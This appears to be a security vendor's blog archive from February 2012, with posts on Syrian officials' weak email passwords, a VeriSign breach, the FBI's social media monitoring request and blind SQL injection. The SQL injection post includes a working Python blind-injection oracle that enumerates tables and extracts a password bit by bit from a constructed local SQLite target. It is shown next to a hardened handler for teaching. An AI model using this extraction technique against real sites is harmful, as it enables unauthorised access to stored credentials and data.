14 posts from February 2012
February 07, 2012
Syrian President's Password: 12345

In an interview, the Syrian president Assad claims that the 'American psyche can be easily manipulated.'

Not as easy to manipulate as his email password, however:

Some 78 inboxes of Assad's aides and advisers were hacked and the password that some used was "12345". Among those whose email was exposed were the Minister of Presidential Affairs Mansour Fadlallah Azzam and Assad's media adviser, Bouthaina Shaaban.

As one of our blog readers noted, "I have the same combination on my luggage."


February 02, 2012
VeriSign Breached

Amazing story from Reuters.

Note how the breach was reported:

The VeriSign attacks were revealed in a quarterly U.S. Securities and Exchange Commission filing in October that followed new guidelines on reporting security breaches to investors. It was the most striking disclosure to emerge in a review by Reuters of more than 2,000 documents mentioning breach risks since the SEC guidance was published.

The article speculates that VeriSign's SSL certificate infrastructure may have been a key target of the attack.

Until August 2010, VeriSign was one of the largest providers of Secure Sockets Layer certificates, which Web browsers look for when connecting users to sites that begin "https," including most financial sites and some email and other communications portals.

If the SSL process were corrupted, "you could create a Bank of America certificate or Google certificate that is trusted by every browser in the world," said prominent security consultant Dmitri Alperovitch, president of Asymmetric Cyber Operations.

This shouldn't surprise anyone. As we wrote late in 2011, while a growing number of web applications are delivered over HTTPS (HTTP over SSL), attackers are increasingly focusing on the components of SSL itself rather than the applications behind it. We are seeing a rise in attacks that target the worldwide infrastructure supporting SSL, above all the certificate authorities whose signatures every browser trusts. We expected these attacks to reach a tipping point in 2012 and, in turn, to prompt a serious discussion about real alternatives for secure web communications. The VeriSign attack suggests the tipping point may actually have arrived in 2011.

So who did it?

The Reuters piece suggests government-sponsored hackers.  Possible.  Another possibility:  private hackers who resell the booty to the governments and enterprises who may want it. 


SQL Injection Part II: Seeing A Blind SQL Injection

We started a blog series in January on SQL injection.  Today, Groundhog Day, the groundhog predicted a longer winter full of SQL injection so now is a fitting time to post Part II of our series. Today's post was authored by Tal Be'ery (who is not pictured below).

TinKode, a famous hacker, has reportedly been caught.  TinKode was talented and best known for his mastery of the black art of Blind SQL injection.  (The term Blind SQL injection was coined by Imperva CTO Amichai Shulman almost a decade ago.)

Using Blind SQL injection, TinKode was able to hack many sites, including the following:

  • Army.mil
  • Nasa.gov
  • UK Ministry of Defence (mod.uk)
  • Yahoo.com
  • European Space Agency (ESA.INT)

First, let’s define a blind SQL injection.  According to Wikipedia:

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

We can demonstrate it with the pictures taken by TinKode himself describing the Yahoo hack, published more than two years ago. In this case he found a page that displays differently depending on the result of a logical statement injected into the legitimate SQL statement behind that page. When the injected condition evaluates to TRUE (and 1=1), the "Rich Media Options" box gets populated (click any photo to BIGGIFY):

Blind1

But when the injected condition evaluates to FALSE (and 1=2), "Rich Media Options" remains empty:

Blind2

TinKode could then guess his way through the database, using this one-bit signal to learn whether each guess was right or wrong. In this query, he confirms that the default "mysql.user" table exists, is accessible, and holds the columns user and password:

Blind3

For a full live demo, see the "Blindfolded SQL Injection Demonstration" video on the ImpervaChannel on YouTube: http://www.youtube.com/watch?v=DclGr44UDNA.

Lastly, how do you mitigate Blind SQL injection? The injection itself is no different from any other SQL injection; only the way the results leak out differs, so the same defences apply. See Part I for the gory details.
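To make the procedure above concrete, here is an added example that is not TinKode's script, not the Yahoo target, and not Imperva's code. It runs the same TRUE/FALSE oracle against a constructed SQLite-backed stand-in for the vulnerable page: first the 1=1 / 1=2 probe, then the "does this table/column exist?" guesses, then recovery of a value one bit at a time, and finally the same payload against a handler hardened with a bound parameter as Part I recommends. Everything in the stand-in is made up for the demo: the media and users tables, the user and password columns, the valid id 7, the "Rich Media Options" row and the admin credentials. SQLite's sqlite_master and unicode() play the roles MySQL's information_schema and ascii() would play against a real target.

```python
import sqlite3

# Constructed stand-in for the target application (added example; the schema,
# rows and the valid id 7 are invented for this demo).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE media (id INTEGER, title TEXT)")
    con.execute("INSERT INTO media VALUES (7, 'Rich Media Options')")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def vulnerable_page(con, media_id):
    """Vulnerable handler: the request parameter is concatenated into SQL.
    Returns the rendered title, or '' when no row comes back or the query
    errors (a broken query renders as an empty page too). That empty/non-empty
    difference is the attacker's only signal; no data is ever echoed."""
    try:
        row = con.execute("SELECT title FROM media WHERE id = " + media_id).fetchone()
    except sqlite3.Error:
        return ""
    return row[0] if row else ""


def safe_page(con, media_id):
    """Hardened handler: the value travels as a bound parameter, so it is
    compared to id and never parsed as SQL. The isdigit() check is defence in
    depth (reject junk before it reaches the database) and lets int() be safe."""
    if not media_id.isdigit():
        return ""
    row = con.execute("SELECT title FROM media WHERE id = ?", (int(media_id),)).fetchone()
    return row[0] if row else ""


class BlindOracle:
    """Turns the page into a yes/no oracle and counts the requests spent."""

    def __init__(self, page):
        self.page = page
        self.queries = 0

    def ask(self, condition):
        self.queries += 1
        # The valid id 7 only yields its row when the injected condition is TRUE.
        return self.page("7 and (" + condition + ")") != ""


def table_exists(oracle, name):
    # sqlite_master plays the role of MySQL's information_schema here.
    return oracle.ask(
        f"(select count(*) from sqlite_master where type='table' and name='{name}') = 1")


def column_exists(oracle, table, column):
    # Naming a missing column makes the query error out, and the error page reads as FALSE.
    return oracle.ask(f"(select count({column}) from {table}) >= 0")


def extract_string(oracle, expr, max_len=64):
    """Recover the result of SQL expression `expr` one bit at a time: seven
    yes/no questions per character (7-bit ASCII, MSB first), stopping at the
    first position that reads as NUL, i.e. past the end of the string."""
    result = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):
            # substr() past the end gives '' and unicode('') is NULL, hence coalesce().
            cond = f"((coalesce(unicode(substr(({expr}),{pos},1)),0) >> {bit}) & 1) = 1"
            if oracle.ask(cond):
                code |= 1 << bit
        if code == 0:
            break
        result += chr(code)
    return result


def demo():
    con = make_db()
    oracle = BlindOracle(lambda p: vulnerable_page(con, p))
    return {
        "true_page": oracle.ask("1=1"),
        "false_page": oracle.ask("1=2"),
        "users_table": table_exists(oracle, "users"),
        "bogus_table": table_exists(oracle, "mysql_user"),
        "password_col": column_exists(oracle, "users", "password"),
        "admin_password": extract_string(
            oracle, "select password from users where user='admin'"),
        "queries": oracle.queries,
        # Same injected payload against the hardened handler: nothing leaks.
        "safe_true": safe_page(con, "7 and 1=1"),
        "safe_plain": safe_page(con, "7"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two things worth noticing when you run it. Recovering a six-character password costs 49 requests (seven bits for each of six characters, plus seven more to detect the end), which is why blind injection is slow, noisy in the logs, and almost always automated. And the hardened handler never sees SQL in the parameter at all: the injected "7 and 1=1" is rejected as a non-integer before the query runs, and even without that check a bound parameter would be compared against id rather than interpreted.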


February 01, 2012
The FBI's Social Media Monitoring

The FBI has issued an RFI for social media monitoring.

It's a long document, but here's the bottom line:

FBI

This shouldn't surprise anyone.  The use of social media as a communications and recruitment platform has made this a necessity.
